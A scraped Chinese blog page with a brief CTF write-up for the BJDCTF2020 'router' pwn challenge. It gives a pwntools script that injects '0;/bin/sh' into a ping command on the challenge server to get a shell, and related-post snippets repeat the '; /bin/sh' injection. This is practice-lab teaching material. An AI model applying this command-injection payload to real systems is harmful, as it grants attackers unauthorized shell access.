BJDCTF2020 router

最新推荐文章于 2025-04-21 21:50:05 发布

whit233

最新推荐文章于 2025-04-21 21:50:05 发布

阅读量338

点赞数

分类专栏： ctfshow pwn详细wp 文章标签： python

本文链接：https://blog.youkuaiyun.com/qq_39980610/article/details/126468868

版权

ctfshow pwn详细wp 专栏收录该内容

14 篇文章

订阅专栏

这篇博客展示了如何使用Python的pwn库远程连接到ctf.show的pwn.challenge服务，并执行exploit。博主通过发送特定输入启动/bin/sh，进而实现与服务的交互。这是一个关于网络安全和CTF挑战的实战案例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

还是；

exp：

from pwn import *
context.log_level = "debug"
io = remote("pwn.challenge.ctf.show", 28180)
io.sendline("1")
io.sendlineafter("address:\n",b"0;/bin/sh")
io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

whit233

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF pwn水题大赏（三）

o琦野o的博客

02-03

433

BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出，利用 write

【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3

arttnba3的博客

11-20

1516

GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0

1 条评论您还未登录，请先登录后发表或查看评论

bjdctf_2020_router

m0sway的博客

11-27

661

bjdctf_2020_router 使用checksec查看：只开启了栈不可执行，放进IDA中查看，程序逻辑代码都在main()函数中，也是一个菜单类题目选项2和4是没有用的，来看看1和3： 1中用户可输入0x10大小的string，程序将这个string用system()执行了？？？？？？？ 3 栈溢出既然1能直接执行，那就试试直接连上去cat flag吧当直接使用r.sendline("cat flag")时，可以看到程序其实时已经调用了系统命令ping 接下来只需要绕过ping即可

bjdctf_2020_router--buuctf

最新发布

2301_81060697的博客

04-21

264

分号实现命令一行执行

bjdctf-2020-router

m0_73743784的博客

09-01

307

其实知道 Linux 中的命令执行可以用;分隔就会非常简单。

BUUCTF pwn——bjdctf_2020_router

CNS-Enterprise BCC-1701-J

05-09

345

BUUCTF 做题练习

bjdctf_2020_router 1

weixin_74861133的博客

03-10

454

逻辑很简单，一直打印菜单，但仔细看来只有1有用，别的都是迷惑的，1中的功能先是读入一个0x10大小的字符串buf，然后使用strcat函数将buf拼接在dest后面，那这个dest是什么呢，我们先随便输入一个字符串跟据后面的提示想到dest应该是ping，因为ping命令后面什么也不跟会报错。还有一种方法就是上面已经有了dest的值了。

BUUCTF-pwn刷题记录（22-7-30更新）

Morphy_Amo的博客

03-04

4451

BUUCTF刷题记录

ctfshow pwn题学习笔记

Scarehehe的博客

11-30

6689

文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护进入pwnme函数发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804

【BUUCTF】bjdctf_2020_router

m0_51251108的博客

12-31

377

【BUUCTF】bjdctf_2020_router linux里面命令可以用；或&分隔，接下来就可以输我们要的命令了

[BUUCTF-pwn]——bjdctf_2020_router

Y_peak的博客

03-16

409

[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞，如果输入； /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...

[BUUCTF]PWN——bjdctf_2020_router

mcmuyanga的博客

11-06

1112

bjdctf_2020_router 附件步骤：例行检查，64位程序，开启了NX保护本地试运行一下程序，看看大概的情况会让我们选择，选择4.root，没什么用，但是注意了，这边选1会执行ping命令，尝试在ping命令后拼接ls，可以看到ls命令也执行了这边利用了linux下的命令机制，命令1+；+命令2 这样的格式两种指令都会执行 3 . 利用这点，远程连接，尝试读出flag ...

BUUCTF-bjdctf_2020_router-WP

Rt1Text的博客

02-12

502

64位。

BJDCTF-2020-WRITEUP---TiKi小组

pone2233的博客

03-23

2543

title: BJDCTF 2020 刷题记录 categories: CTF tags: BJDCTF CTF2020 BJDCTF Web duangShell 根据提示，输入.index.php.swp下载到源码。之后在linux内输入vim -r index.php.swp即可看到源码 <!DOCTYPE html> <html lang="en"> &...

BUUCTF pwn——bjdctf_2020_babystack

CNS-Enterprise BCC-1701-J

03-31

384

BUUCTF 做题练习

BUUCTF bjdctf_2020_router

2401_88087539的博客

04-21

129

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正